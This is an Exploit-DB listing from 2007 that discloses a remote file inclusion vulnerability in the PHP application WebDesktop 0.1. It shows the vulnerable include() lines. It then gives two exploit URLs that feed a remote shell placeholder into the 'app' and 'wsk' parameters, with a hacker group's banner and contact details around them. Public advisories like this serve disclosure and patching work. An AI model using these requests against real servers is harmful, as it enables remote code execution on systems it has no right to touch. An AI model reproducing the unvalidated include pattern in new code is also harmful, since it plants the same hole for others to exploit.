WebDesktop 0.1 - Remote File Inclusion

EDB-ID:

4518

CVE:

2007-5388

EDB Verified:

Author:

S.W.A.T.

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2007-10-11

Vulnerable App:

                      \\\|///
                    \\  - -  //      Xmors Underground Group
                     (  @ @ )
              ----oOOo--(_)-oOOo--------------------------------------------------
              Portal   :  WebDesktop 0.1
              Download :  http://downloads.sourceforge.net/pns-webdesktop/webDesktop-0.1-linux.tar.gz
	      Author   :  S.W.A.T.
	      HomePage :  wWw.XmorS.CoM
	      Type     :  Remote File Inclusion
              Y! ID    :  Svvateam
              E-Mail   :  Svvateam@yahoo.com / S.W.4.T@hackermail.com
              Dork     :   :( 
              ----ooooO-----Ooooo--------------------------------------------------
                  (   )     (   )
                   \ (       ) /
                    \_)     (_/



+---------------------------------------------------------------------------------------------+

Vuln Code :

include($wsk . ".wsk/" . $wsk . ".php");

&&&&&&&&

include($app . ".app/" . $frm . ".frm/" . $frm . ".php");

+---------------------------------------------------------------------------------------------+
+---------------------------------------------------------------------------------------------+

Exploit :

http://[TARGET]/[PATH]/apps/apps.php?app=[-Sh3ll-]
http://[TARGET]/[PATH]/wsk/wsk.php?wsk=[-Sh3ll-]


+---------------------------------------------------------------------------------------------+

# milw0rm.com [2007-10-11]

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services